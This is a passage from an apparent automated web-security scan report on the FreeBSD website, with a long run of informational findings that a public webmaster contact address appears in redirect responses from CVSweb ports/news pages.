The following email address was disclosed in the response:

www@FreeBSD.org

Request

GET /cgi/cvsweb.cgi/ports/news/fidogate-ds HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Status: 301 Moved Permanently
Location: /cgi/cvsweb.cgi/ports/news/fidogate-ds/
Content-Type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:23:43 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 7107

<head>
<meta name="robots" content="nofollow" />
<meta name="generator" content="FreeBSD-CVSweb 3.0.6" />
<meta http-equiv="Content-Script-Type" content="text/javascript" />
<meta http-equiv="Content-
...[SNIP]...
<a href='http://www.FreeBSD.org/mailto.html'>www@FreeBSD.org</a>
...[SNIP]...

24.204. http://www.freebsd.org/cgi/cvsweb.cgi/ports/news/golded+ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.freebsd.org
Path:	/cgi/cvsweb.cgi/ports/news/golded+

Issue detail

The following email address was disclosed in the response:

www@FreeBSD.org

Request

GET /cgi/cvsweb.cgi/ports/news/golded+ HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Status: 301 Moved Permanently
Location: /cgi/cvsweb.cgi/ports/news/golded%2B/
Content-Type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:24:30 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 7105

<head>
<meta name="robots" content="nofollow" />
<meta name="generator" content="FreeBSD-CVSweb 3.0.6" />
<meta http-equiv="Content-Script-Type" content="text/javascript" />
<meta http-equiv="Content-
...[SNIP]...
<a href='http://www.FreeBSD.org/mailto.html'>www@FreeBSD.org</a>
...[SNIP]...

24.205. http://www.freebsd.org/cgi/cvsweb.cgi/ports/news/gup previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.freebsd.org
Path:	/cgi/cvsweb.cgi/ports/news/gup

Issue detail

The following email address was disclosed in the response:

www@FreeBSD.org

Request

GET /cgi/cvsweb.cgi/ports/news/gup HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Status: 301 Moved Permanently
Location: /cgi/cvsweb.cgi/ports/news/gup/
Content-Type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:24:34 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 7099

<head>
<meta name="robots" content="nofollow" />
<meta name="generator" content="FreeBSD-CVSweb 3.0.6" />
<meta http-equiv="Content-Script-Type" content="text/javascript" />
<meta http-equiv="Content-
...[SNIP]...
<a href='http://www.FreeBSD.org/mailto.html'>www@FreeBSD.org</a>
...[SNIP]...

24.206. http://www.freebsd.org/cgi/cvsweb.cgi/ports/news/hellanzb previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.freebsd.org
Path:	/cgi/cvsweb.cgi/ports/news/hellanzb

Issue detail

The following email address was disclosed in the response:

www@FreeBSD.org

Request

GET /cgi/cvsweb.cgi/ports/news/hellanzb HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Status: 301 Moved Permanently
Location: /cgi/cvsweb.cgi/ports/news/hellanzb/
Content-Type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:25:27 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 7104

<head>
<meta name="robots" content="nofollow" />
<meta name="generator" content="FreeBSD-CVSweb 3.0.6" />
<meta http-equiv="Content-Script-Type" content="text/javascript" />
<meta http-equiv="Content-
...[SNIP]...
<a href='http://www.FreeBSD.org/mailto.html'>www@FreeBSD.org</a>
...[SNIP]...

24.207. http://www.freebsd.org/cgi/cvsweb.cgi/ports/news/husky-base previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.freebsd.org
Path:	/cgi/cvsweb.cgi/ports/news/husky-base

Issue detail

The following email address was disclosed in the response:

www@FreeBSD.org

Request

GET /cgi/cvsweb.cgi/ports/news/husky-base HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Status: 301 Moved Permanently
Location: /cgi/cvsweb.cgi/ports/news/husky-base/
Content-Type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:25:28 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 7106

<head>
<meta name="robots" content="nofollow" />
<meta name="generator" content="FreeBSD-CVSweb 3.0.6" />
<meta http-equiv="Content-Script-Type" content="text/javascript" />
<meta http-equiv="Content-
...[SNIP]...
<a href='http://www.FreeBSD.org/mailto.html'>www@FreeBSD.org</a>
...[SNIP]...

24.208. http://www.freebsd.org/cgi/cvsweb.cgi/ports/news/husky-base-devel previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.freebsd.org
Path:	/cgi/cvsweb.cgi/ports/news/husky-base-devel

Issue detail

The following email address was disclosed in the response:

www@FreeBSD.org

Request

GET /cgi/cvsweb.cgi/ports/news/husky-base-devel HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Status: 301 Moved Permanently
Location: /cgi/cvsweb.cgi/ports/news/husky-base-devel/
Content-Type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:25:49 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 7112

<head>
<meta name="robots" content="nofollow" />
<meta name="generator" content="FreeBSD-CVSweb 3.0.6" />
<meta http-equiv="Content-Script-Type" content="text/javascript" />
<meta http-equiv="Content-
...[SNIP]...
<a href='http://www.FreeBSD.org/mailto.html'>www@FreeBSD.org</a>
...[SNIP]...

24.209. http://www.freebsd.org/cgi/cvsweb.cgi/ports/news/husky-bsopack previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.freebsd.org
Path:	/cgi/cvsweb.cgi/ports/news/husky-bsopack

Issue detail

The following email address was disclosed in the response:

www@FreeBSD.org

Request

GET /cgi/cvsweb.cgi/ports/news/husky-bsopack HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Status: 301 Moved Permanently
Location: /cgi/cvsweb.cgi/ports/news/husky-bsopack/
Content-Type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:25:53 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 7109

<head>
<meta name="robots" content="nofollow" />
<meta name="generator" content="FreeBSD-CVSweb 3.0.6" />
<meta http-equiv="Content-Script-Type" content="text/javascript" />
<meta http-equiv="Content-
...[SNIP]...
<a href='http://www.FreeBSD.org/mailto.html'>www@FreeBSD.org</a>
...[SNIP]...

24.210. http://www.freebsd.org/cgi/cvsweb.cgi/ports/news/husky-fidoconf previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.freebsd.org
Path:	/cgi/cvsweb.cgi/ports/news/husky-fidoconf

Issue detail

The following email address was disclosed in the response:

www@FreeBSD.org

Request

GET /cgi/cvsweb.cgi/ports/news/husky-fidoconf HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Status: 301 Moved Permanently
Location: /cgi/cvsweb.cgi/ports/news/husky-fidoconf/
Content-Type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:25:52 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 7110

<head>
<meta name="robots" content="nofollow" />
<meta name="generator" content="FreeBSD-CVSweb 3.0.6" />
<meta http-equiv="Content-Script-Type" content="text/javascript" />
<meta http-equiv="Content-
...[SNIP]...
<a href='http://www.FreeBSD.org/mailto.html'>www@FreeBSD.org</a>
...[SNIP]...

24.211. http://www.freebsd.org/cgi/cvsweb.cgi/ports/news/husky-fidoconf-devel previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.freebsd.org
Path:	/cgi/cvsweb.cgi/ports/news/husky-fidoconf-devel

Issue detail

The following email address was disclosed in the response:

www@FreeBSD.org

Request

GET /cgi/cvsweb.cgi/ports/news/husky-fidoconf-devel HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Status: 301 Moved Permanently
Location: /cgi/cvsweb.cgi/ports/news/husky-fidoconf-devel/
Content-Type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:25:55 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 7116

<head>
<meta name="robots" content="nofollow" />
<meta name="generator" content="FreeBSD-CVSweb 3.0.6" />
<meta http-equiv="Content-Script-Type" content="text/javascript" />
<meta http-equiv="Content-
...[SNIP]...
<a href='http://www.FreeBSD.org/mailto.html'>www@FreeBSD.org</a>
...[SNIP]...

24.212. http://www.freebsd.org/cgi/cvsweb.cgi/ports/news/husky-hpt previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.freebsd.org
Path:	/cgi/cvsweb.cgi/ports/news/husky-hpt

Issue detail

The following email address was disclosed in the response:

www@FreeBSD.org

Request

GET /cgi/cvsweb.cgi/ports/news/husky-hpt HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Status: 301 Moved Permanently
Location: /cgi/cvsweb.cgi/ports/news/husky-hpt/
Content-Type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:25:56 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 7105

<head>
<meta name="robots" content="nofollow" />
<meta name="generator" content="FreeBSD-CVSweb 3.0.6" />
<meta http-equiv="Content-Script-Type" content="text/javascript" />
<meta http-equiv="Content-
...[SNIP]...
<a href='http://www.FreeBSD.org/mailto.html'>www@FreeBSD.org</a>
...[SNIP]...

24.213. http://www.freebsd.org/cgi/cvsweb.cgi/ports/news/husky-hpt-devel previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.freebsd.org
Path:	/cgi/cvsweb.cgi/ports/news/husky-hpt-devel

Issue detail

The following email address was disclosed in the response:

www@FreeBSD.org

Request

GET /cgi/cvsweb.cgi/ports/news/husky-hpt-devel HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Status: 301 Moved Permanently
Location: /cgi/cvsweb.cgi/ports/news/husky-hpt-devel/
Content-Type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:26:19 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 7111

<head>
<meta name="robots" content="nofollow" />
<meta name="generator" content="FreeBSD-CVSweb 3.0.6" />
<meta http-equiv="Content-Script-Type" content="text/javascript" />
<meta http-equiv="Content-
...[SNIP]...
<a href='http://www.FreeBSD.org/mailto.html'>www@FreeBSD.org</a>
...[SNIP]...

24.214. http://www.freebsd.org/cgi/cvsweb.cgi/ports/news/husky-hptkill previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.freebsd.org
Path:	/cgi/cvsweb.cgi/ports/news/husky-hptkill

Issue detail

The following email address was disclosed in the response:

www@FreeBSD.org

Request

GET /cgi/cvsweb.cgi/ports/news/husky-hptkill HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Status: 301 Moved Permanently
Location: /cgi/cvsweb.cgi/ports/news/husky-hptkill/
Content-Type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:26:30 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 7109

<head>
<meta name="robots" content="nofollow" />
<meta name="generator" content="FreeBSD-CVSweb 3.0.6" />
<meta http-equiv="Content-Script-Type" content="text/javascript" />
<meta http-equiv="Content-
...[SNIP]...
<a href='http://www.FreeBSD.org/mailto.html'>www@FreeBSD.org</a>
...[SNIP]...

24.215. http://www.freebsd.org/cgi/cvsweb.cgi/ports/news/husky-hptsqfix previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.freebsd.org
Path:	/cgi/cvsweb.cgi/ports/news/husky-hptsqfix

Issue detail

The following email address was disclosed in the response:

www@FreeBSD.org

Request

GET /cgi/cvsweb.cgi/ports/news/husky-hptsqfix HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Status: 301 Moved Permanently
Location: /cgi/cvsweb.cgi/ports/news/husky-hptsqfix/
Content-Type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:26:53 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 7110

<head>
<meta name="robots" content="nofollow" />
<meta name="generator" content="FreeBSD-CVSweb 3.0.6" />
<meta http-equiv="Content-Script-Type" content="text/javascript" />
<meta http-equiv="Content-
...[SNIP]...
<a href='http://www.FreeBSD.org/mailto.html'>www@FreeBSD.org</a>
...[SNIP]...

24.216. http://www.freebsd.org/cgi/cvsweb.cgi/ports/news/husky-hpucode previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.freebsd.org
Path:	/cgi/cvsweb.cgi/ports/news/husky-hpucode

Issue detail

The following email address was disclosed in the response:

www@FreeBSD.org

Request

GET /cgi/cvsweb.cgi/ports/news/husky-hpucode HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Status: 301 Moved Permanently
Location: /cgi/cvsweb.cgi/ports/news/husky-hpucode/
Content-Type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:26:57 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 7109

<head>
<meta name="robots" content="nofollow" />
<meta name="generator" content="FreeBSD-CVSweb 3.0.6" />
<meta http-equiv="Content-Script-Type" content="text/javascript" />
<meta http-equiv="Content-
...[SNIP]...
<a href='http://www.FreeBSD.org/mailto.html'>www@FreeBSD.org</a>
...[SNIP]...

24.217. http://www.freebsd.org/cgi/cvsweb.cgi/ports/news/husky-htick previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.freebsd.org
Path:	/cgi/cvsweb.cgi/ports/news/husky-htick

Issue detail

The following email address was disclosed in the response:

www@FreeBSD.org

Request

GET /cgi/cvsweb.cgi/ports/news/husky-htick HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Status: 301 Moved Permanently
Location: /cgi/cvsweb.cgi/ports/news/husky-htick/
Content-Type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:28:15 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 7107

<head>
<meta name="robots" content="nofollow" />
<meta name="generator" content="FreeBSD-CVSweb 3.0.6" />
<meta http-equiv="Content-Script-Type" content="text/javascript" />
<meta http-equiv="Content-
...[SNIP]...
<a href='http://www.FreeBSD.org/mailto.html'>www@FreeBSD.org</a>
...[SNIP]...

24.218. http://www.freebsd.org/cgi/cvsweb.cgi/ports/news/husky-htick-devel previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.freebsd.org
Path:	/cgi/cvsweb.cgi/ports/news/husky-htick-devel

Issue detail

The following email address was disclosed in the response:

www@FreeBSD.org

Request

GET /cgi/cvsweb.cgi/ports/news/husky-htick-devel HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Status: 301 Moved Permanently
Location: /cgi/cvsweb.cgi/ports/news/husky-htick-devel/
Content-Type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:28:53 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 7113

<head>
<meta name="robots" content="nofollow" />
<meta name="generator" content="FreeBSD-CVSweb 3.0.6" />
<meta http-equiv="Content-Script-Type" content="text/javascript" />
<meta http-equiv="Content-
...[SNIP]...
<a href='http://www.FreeBSD.org/mailto.html'>www@FreeBSD.org</a>
...[SNIP]...

24.219. http://www.freebsd.org/cgi/cvsweb.cgi/ports/news/husky-smapi-devel previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.freebsd.org
Path:	/cgi/cvsweb.cgi/ports/news/husky-smapi-devel

Issue detail

The following email address was disclosed in the response:

www@FreeBSD.org

Request

GET /cgi/cvsweb.cgi/ports/news/husky-smapi-devel HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Status: 301 Moved Permanently
Location: /cgi/cvsweb.cgi/ports/news/husky-smapi-devel/
Content-Type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:28:57 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 7113

<head>
<meta name="robots" content="nofollow" />
<meta name="generator" content="FreeBSD-CVSweb 3.0.6" />
<meta http-equiv="Content-Script-Type" content="text/javascript" />
<meta http-equiv="Content-
...[SNIP]...
<a href='http://www.FreeBSD.org/mailto.html'>www@FreeBSD.org</a>
...[SNIP]...

24.220. http://www.freebsd.org/cgi/cvsweb.cgi/ports/news/inn previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.freebsd.org
Path:	/cgi/cvsweb.cgi/ports/news/inn

Issue detail

The following email address was disclosed in the response:

www@FreeBSD.org

Request

GET /cgi/cvsweb.cgi/ports/news/inn HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Status: 301 Moved Permanently
Location: /cgi/cvsweb.cgi/ports/news/inn/
Content-Type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:30:50 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 7099

<head>
<meta name="robots" content="nofollow" />
<meta name="generator" content="FreeBSD-CVSweb 3.0.6" />
<meta http-equiv="Content-Script-Type" content="text/javascript" />
<meta http-equiv="Content-
...[SNIP]...
<a href='http://www.FreeBSD.org/mailto.html'>www@FreeBSD.org</a>
...[SNIP]...

24.221. http://www.freebsd.org/cgi/cvsweb.cgi/ports/news/knews previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.freebsd.org
Path:	/cgi/cvsweb.cgi/ports/news/knews

Issue detail

The following email address was disclosed in the response:

www@FreeBSD.org

Request

GET /cgi/cvsweb.cgi/ports/news/knews HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Status: 301 Moved Permanently
Location: /cgi/cvsweb.cgi/ports/news/knews/
Content-Type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:31:21 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 7101

<head>
<meta name="robots" content="nofollow" />
<meta name="generator" content="FreeBSD-CVSweb 3.0.6" />
<meta http-equiv="Content-Script-Type" content="text/javascript" />
<meta http-equiv="Content-
...[SNIP]...
<a href='http://www.FreeBSD.org/mailto.html'>www@FreeBSD.org</a>
...[SNIP]...

24.222. http://www.freebsd.org/cgi/cvsweb.cgi/ports/news/leafnode previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.freebsd.org
Path:	/cgi/cvsweb.cgi/ports/news/leafnode

Issue detail

The following email address was disclosed in the response:

www@FreeBSD.org

Request

GET /cgi/cvsweb.cgi/ports/news/leafnode HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Status: 301 Moved Permanently
Location: /cgi/cvsweb.cgi/ports/news/leafnode/
Content-Type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:32:44 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 7104

<head>
<meta name="robots" content="nofollow" />
<meta name="generator" content="FreeBSD-CVSweb 3.0.6" />
<meta http-equiv="Content-Script-Type" content="text/javascript" />
<meta http-equiv="Content-
...[SNIP]...
<a href='http://www.FreeBSD.org/mailto.html'>www@FreeBSD.org</a>
...[SNIP]...

24.223. http://www.freebsd.org/cgi/cvsweb.cgi/ports/news/lottanzb previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.freebsd.org
Path:	/cgi/cvsweb.cgi/ports/news/lottanzb

Issue detail

The following email address was disclosed in the response:

www@FreeBSD.org

Request

GET /cgi/cvsweb.cgi/ports/news/lottanzb HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Status: 301 Moved Permanently
Location: /cgi/cvsweb.cgi/ports/news/lottanzb/
Content-Type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:33:02 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 7104

<head>
<meta name="robots" content="nofollow" />
<meta name="generator" content="FreeBSD-CVSweb 3.0.6" />
<meta http-equiv="Content-Script-Type" content="text/javascript" />
<meta http-equiv="Content-
...[SNIP]...
<a href='http://www.FreeBSD.org/mailto.html'>www@FreeBSD.org</a>
...[SNIP]...

24.224. http://www.freebsd.org/cgi/cvsweb.cgi/ports/news/lusernet previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.freebsd.org
Path:	/cgi/cvsweb.cgi/ports/news/lusernet

Issue detail

The following email address was disclosed in the response:

www@FreeBSD.org

Request

GET /cgi/cvsweb.cgi/ports/news/lusernet HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Status: 301 Moved Permanently
Location: /cgi/cvsweb.cgi/ports/news/lusernet/
Content-Type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:33:02 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 7104

<head>
<meta name="robots" content="nofollow" />
<meta name="generator" content="FreeBSD-CVSweb 3.0.6" />
<meta http-equiv="Content-Script-Type" content="text/javascript" />
<meta http-equiv="Content-
...[SNIP]...
<a href='http://www.FreeBSD.org/mailto.html'>www@FreeBSD.org</a>
...[SNIP]...

24.225. http://www.freebsd.org/cgi/cvsweb.cgi/ports/news/mmail previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.freebsd.org
Path:	/cgi/cvsweb.cgi/ports/news/mmail

Issue detail

The following email address was disclosed in the response:

www@FreeBSD.org

Request

GET /cgi/cvsweb.cgi/ports/news/mmail HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Status: 301 Moved Permanently
Location: /cgi/cvsweb.cgi/ports/news/mmail/
Content-Type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:33:03 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 7101

<head>
<meta name="robots" content="nofollow" />
<meta name="generator" content="FreeBSD-CVSweb 3.0.6" />
<meta http-equiv="Content-Script-Type" content="text/javascript" />
<meta http-equiv="Content-
...[SNIP]...
<a href='http://www.FreeBSD.org/mailto.html'>www@FreeBSD.org</a>
...[SNIP]...

24.226. http://www.freebsd.org/cgi/cvsweb.cgi/ports/news/multisuck previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.freebsd.org
Path:	/cgi/cvsweb.cgi/ports/news/multisuck

Issue detail

The following email address was disclosed in the response:

www@FreeBSD.org

Request

GET /cgi/cvsweb.cgi/ports/news/multisuck HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Status: 301 Moved Permanently
Location: /cgi/cvsweb.cgi/ports/news/multisuck/
Content-Type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:33:02 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 7105

<head>
<meta name="robots" content="nofollow" />
<meta name="generator" content="FreeBSD-CVSweb 3.0.6" />
<meta http-equiv="Content-Script-Type" content="text/javascript" />
<meta http-equiv="Content-
...[SNIP]...
<a href='http://www.FreeBSD.org/mailto.html'>www@FreeBSD.org</a>
...[SNIP]...

24.227. http://www.freebsd.org/cgi/cvsweb.cgi/ports/news/newscache previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.freebsd.org
Path:	/cgi/cvsweb.cgi/ports/news/newscache

Issue detail

The following email address was disclosed in the response:

www@FreeBSD.org

Request

GET /cgi/cvsweb.cgi/ports/news/newscache HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Status: 301 Moved Permanently
Location: /cgi/cvsweb.cgi/ports/news/newscache/
Content-Type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:33:03 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 7105

<head>
<meta name="robots" content="nofollow" />
<meta name="generator" content="FreeBSD-CVSweb 3.0.6" />
<meta http-equiv="Content-Script-Type" content="text/javascript" />
<meta http-equiv="Content-
...[SNIP]...
<a href='http://www.FreeBSD.org/mailto.html'>www@FreeBSD.org</a>
...[SNIP]...

24.228. http://www.freebsd.org/cgi/cvsweb.cgi/ports/news/newsfetch previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.freebsd.org
Path:	/cgi/cvsweb.cgi/ports/news/newsfetch

Issue detail

The following email address was disclosed in the response:

www@FreeBSD.org

Request

GET /cgi/cvsweb.cgi/ports/news/newsfetch HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Status: 301 Moved Permanently
Location: /cgi/cvsweb.cgi/ports/news/newsfetch/
Content-Type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:33:03 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 7105

<head>
<meta name="robots" content="nofollow" />
<meta name="generator" content="FreeBSD-CVSweb 3.0.6" />
<meta http-equiv="Content-Script-Type" content="text/javascript" />
<meta http-equiv="Content-
...[SNIP]...
<a href='http://www.FreeBSD.org/mailto.html'>www@FreeBSD.org</a>
...[SNIP]...

24.229. http://www.freebsd.org/cgi/cvsweb.cgi/ports/news/newsfish previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.freebsd.org
Path:	/cgi/cvsweb.cgi/ports/news/newsfish

Issue detail

The following email address was disclosed in the response:

www@FreeBSD.org

Request

GET /cgi/cvsweb.cgi/ports/news/newsfish HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Status: 301 Moved Permanently
Location: /cgi/cvsweb.cgi/ports/news/newsfish/
Content-Type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:33:09 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 7104

<head>
<meta name="robots" content="nofollow" />
<meta name="generator" content="FreeBSD-CVSweb 3.0.6" />
<meta http-equiv="Content-Script-Type" content="text/javascript" />
<meta http-equiv="Content-
...[SNIP]...
<a href='http://www.FreeBSD.org/mailto.html'>www@FreeBSD.org</a>
...[SNIP]...

24.230. http://www.freebsd.org/cgi/cvsweb.cgi/ports/news/newsgrab previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.freebsd.org
Path:	/cgi/cvsweb.cgi/ports/news/newsgrab

Issue detail

The following email address was disclosed in the response:

www@FreeBSD.org

Request

GET /cgi/cvsweb.cgi/ports/news/newsgrab HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Status: 301 Moved Permanently
Location: /cgi/cvsweb.cgi/ports/news/newsgrab/
Content-Type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:33:11 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 7104

<head>
<meta name="robots" content="nofollow" />
<meta name="generator" content="FreeBSD-CVSweb 3.0.6" />
